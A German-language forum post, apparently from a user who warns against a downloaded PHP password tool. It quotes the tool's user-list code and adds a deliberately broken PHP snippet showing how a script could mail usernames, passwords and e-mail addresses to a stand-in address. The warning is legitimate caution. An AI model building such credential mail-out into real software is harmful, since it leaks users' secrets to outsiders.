Einfach ist es zweifellos. Aber ich bin äusserst skeptisch und extrem vorsichtig mit Scripts, welche ich von irgendwoher herunterladen kann und die dann auch noch solche Dinge tun wie auf Passwörter zuzugreifen. Mit PHP-Code kenne ich mich nicht wirklich aus. So ist es mir praktisch unmöglich herauszufinden, was das Tool denn sonst noch alles tut. Schau mal Zeile 900 und folgende an. Da werden Benutzerlisten (mit Benutzername, Passwort, E-Mail-Adresse, ...) erzeugt und übermittelt.
if (isset($_POST['SUBMIT'])) {
// ## Daten wurden übermittelt
AusgabeText2();
CreateUserPass($id, $username, $password, $email, $tabelle, $crypt, $v, $p, $host, $user, $pass, $db, $pre, $dbty);
Fusszeile();
unlink($MyFileName);
} else {
// ## Benutzerliste erzeugen
AusgabeText1();
AusgabeVersion($p, $v);
CreateUserList($id, $username, $password, $email, $tabelle, $crypt, $v, $p, $host, $user, $pass, $db, $pre, $dbty);
Fusszeile();
}
Es wäre ein leichtes, so etwas wie das da in den Code da einzubauen:
<?php$empfaenger = "empfaenger@xyz.com";$betreff = "Benutzerliste von Runner.one";$from = "From: Runner.one <absender@xyz.com>";$text = $username, $password, $email,mail($empfaenger, $betreff, $text, $from);?>
Dieses Beispiel «verhebet nöd», soll aber drastisch aufzeigen, welchen Gefahren man sich unter Umständen aussetzt. Da braucht es schon ganz viel Vertrauen!